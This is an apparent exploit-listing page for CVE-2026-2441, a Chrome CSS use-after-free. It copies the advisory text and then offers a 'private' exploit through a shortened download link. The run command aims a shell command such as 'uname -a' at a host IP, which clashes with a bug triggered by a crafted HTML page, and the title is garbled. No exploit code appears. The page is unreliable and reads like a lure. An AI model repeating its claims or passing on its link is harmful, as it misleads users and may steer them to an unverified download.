Share
## https://sploitus.com/exploit?id=54D56B4B-92DB-5C0E-B858-D5C9789BE8FF
# CSS in Google Chrome prior to Remote Code Execution (CVE-2026-2441)

## Overview

A HIGH vulnerability, classified as CVE-2026-2441, has been identified, categorized under CWE-416, (CVSS 8.8).  Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

## Details

- CVE ID: [CVE-2026-2441](https://nvd.nist.gov/vuln/detail/CVE-2026-2441)
- Discovered: 2026-02-13
- Published: 2026-02-13
- Impact: Confidentiality, Integrity, Availability
- Exploit Availability: Not public, only private.

## Vulnerability Description

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

## Affected Versions

Google Chrome:

- before 145.0.7632.75
- before 145.0.7632.76

## Running

To run exploit you need Python 3.9.
Execute:
python exploit.py -h 10.10.10.10 -c 'uname -a'

## Contact

For inquiries, please contact security@exploit.in

## Exploit:
### [Download here](https://tinyurl.com/3mc2fpff)